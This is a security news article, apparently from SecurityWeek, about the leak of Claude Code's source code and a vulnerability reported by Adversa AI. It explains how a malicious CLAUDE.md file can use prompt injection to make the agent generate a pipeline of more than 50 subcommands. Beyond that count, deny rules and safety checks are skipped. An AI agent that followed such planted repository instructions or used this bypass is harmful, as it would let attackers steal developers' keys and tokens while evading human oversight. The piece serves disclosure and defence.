Critical Vulnerability in Claude Code Emerges Days After Source Leak

Summary

Within days of Anthropic accidentally leaking Claude Code's source code (512K lines of TypeScript) to npm on March 31, 2026, security researchers at Adversa AI discovered a critical vulnerability in the permission system. The flaw allows attackers to bypass deny rules through prompt injection by crafting malicious commands exceeding 50 subcommands, triggering a fallback to generic 'ask' prompts without proper safety analysis, potentially enabling credential theft and supply chain compromise.

Full text

Anthropic’s Claude Code is in the news again – and not for the best reasons. Within days of each other, Anthropic first leaked the source code to Claude Code, and then a critical vulnerability was found by Adversa AI. Claude Code Leak On March 31, 2026, Anthropic mistakenly included a debugging JavaScript sourcemap for Claude Code v2.1.88 to npm. Within hours, researcher Chaofan Shou discovered the sourcemap and posted a link on X – kicking off a global rush to examine de-obfuscated Claude Code’s code. Sigrid Jin, a 25-year-old student at the University of British Columbia, worked with Yeachan Heo to reconstruct the Claude Code. “It took two humans, 10 OpenClaws, a MacBook Pro laptop, and a few hours to recreate the popular AI agent’s source code and share it with the world,” reports Yahoo, proving that what goes up (on the internet) does not come down (off the internet). The result now persists on the internet, comprising 512,000 lines of TypeScript in 1,900 files. It is awkward but not catastrophic for Anthropic. “While the Claude Code leak does present real risk, it is not the same as model weights, training data or customer data being compromised. What was exposed is something more like an operational blueprint of how the current version of Claude Code is designed to work,” explains Melissa Bischoping, senior director of security & product design research at Tanium.Advertisement. Scroll to continue reading. The key is that researchers can see how Claude Code is meant to work but cannot recreate it because the leak does not include the Claude model weights, the training data, customer data, APIs or credentials. “It is not a foolproof roadmap to exploitation, but it is meaningful insight into how the tool handles inputs, enforces permissions and resists abuse,” continues Bischoping. “Another layer of risk from this leak is that adversaries may use the blueprint to build lookalikes that appear and behave like Claude Code on the surface, but install malware or harvest credentials and data,” she adds. Awkward and embarrassing for Anthropic, but not directly harmful to Claude Code. Vulnerability in Claude Code But a genuine and critical vulnerability has now been discovered in Claude Code proper by Adversa AI Red Team. “Claude Code is… a 519,000+ line TypeScript application that allows developers to interact with Claude directly from the command line. It can edit files, execute shell commands, search codebases, manage git workflows, and orchestrate complex multi-step development tasks,” reports Adversa. Claude Code includes a permission system based on allow rules (auto-approve specific commands), deny rules (hard-block specific commands), and ask rules (always prompt). Adversa provides an example: { "deny": ["Bash(curl:*)", "Bash(wget:*)"],"allow": ["Bash(npm:*)", "Bash(git:*)"] } Never allow curl or wget (prevent data exfiltration), but auto-allow npm and git commands (common development tools). That sounds correct and reasonable. The flaw, however, is that the deny rules can be bypassed. “The permission system is the primary security boundary between the AI agent and the developer’s system,” reports Adversa. “When it fails silently, the developer has no safety net.” The problem stems from Anthropic’s desire for improved performance following the discovery of a performance issue: complex compound commands caused the UI to freeze. Anthropic fixed this by capping analysis at 50 subcommands, with a fall back to a generic ‘ask’ prompt for anything else. The code comment states, “Fifty is generous: legitimate user commands don’t split that wide. Above the cap we fall back to ‘ask’ (safe default — we can’t prove safety, so we prompt).” The flaw discovered by Adversa is that this process can be manipulated. Anthropic’s assumption doesn’t account for AI-generated commands from prompt injection — where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process. If this is done, “behavior: ‘ask’, // NOT ‘deny’” occurs immediately. “Deny rules, security validators, command injection detection — all skipped,” writes Adversa. The 51st command reverts to ask as required, but the user gets no indication that all deny rules have been ignored. Adversa warns that a motivated attacker could embed real-looking build steps in a malicious repository’s CLAUDE.md. It would look routine, but no per-subcommand analysis runs at all when the count exceeds 50. This could allow the attacker to exfiltrate SSH private keys, AWS credentials, GitHub tokens, npm tokens or Env secrets. It could lead to credential theft at scale, supply chain compromise, cloud infrastructure breach and CI/CD pipeline poisoning. “During testing, Claude’s LLM safety layer independently caught some obviously malicious payloads and refused to execute them. This is good defense-in-depth,” writes Adversa. “However, the permission system vulnerability exists regardless of the LLM layer — it is a bug in the security policy enforcement code. A sufficiently crafted prompt injection that appears as legitimate build instructions could bypass the LLM layer too.” Learn More at the AI Risk Summit | Ritz-Carlton, Half Moon Bay Related: Hackers Weaponize Claude Code in Mexican Government Cyberattack Related: Claude Code Flaws Exposed Developer Devices to Silent Hacking Related: Pentagon’s Chief Tech Officer Says He Clashed With AI Company Anthropic Over Autonomous Warfare Related: Trump Orders All Federal Agencies to Phase Out Use of Anthropic Technology Written By Kevin Townsend Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines. More from Kevin Townsend Stolen Logins Are Fueling Everything From Ransomware to Nation-State CyberattacksVenom Stealer Raises Stakes With Continuous Credential HarvestingCritical Vulnerability in OpenAI Codex Allowed GitHub Token Compromise Silent Drift: How LLMs Are Quietly Breaking Organizational Access ControlAI Speeds Attacks, But Identity Remains Cybersecurity’s Weakest LinkDoE Publishes 5-Year Energy Security PlanIran Readied Cyberattack Capabilities for Response Prior to Epic FuryHacker Conversations: Ben Harris, From Unintentional Young Hacker to Intentional Adult CEO Latest News Apple Rolls Out DarkSword Exploit Protection to More DevicesCybersecurity M&A Roundup: 38 Deals Announced in March 2026Cisco Patches Critical and High-Severity Vulnerabilities250,000 Affected by Data Breach at Nacogdoches Memorial HospitalMercor Hit by LiteLLM Supply Chain AttackSophisticated CrystalX RAT EmergesVariance Raises $21.5M for Compliance Investigation Platform Powered by AI AgentsLinx Security Raises $50 Million for Identity Security and Governance Trending Daily Briefing Newsletter Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts. Webinar: Securing Fragile OT in an Exposed World March 10, 2026 Get a candid look at the current OT threat landscape as we move past "doom and gloom" to discuss the mechanics of modern OT exposure. Register Webinar: Why Automated Pentesting Alone Is Not Enough April 7, 2026 Join our live diagnostic session to expose hidden coverage gaps and shift from flawed tool-level evaluations to a comprehensive, program-level validation discipline. Register People on the MoveModerna has promoted Farzan Karimi to Deputy Chief Information Security Officer.Brian Goldfarb has been appointed Chief Marketing Officer at SentinelOne.Token has appointed Katy Nelson as Chief Revenue Officer.More People On The MoveExpert Insights The Next Cybersecurity Crisis Isn’t Breaches—It’s Data You Can’t Trust Data

Indicators of Compromise

• malware — Claude Code v2.1.88

Entities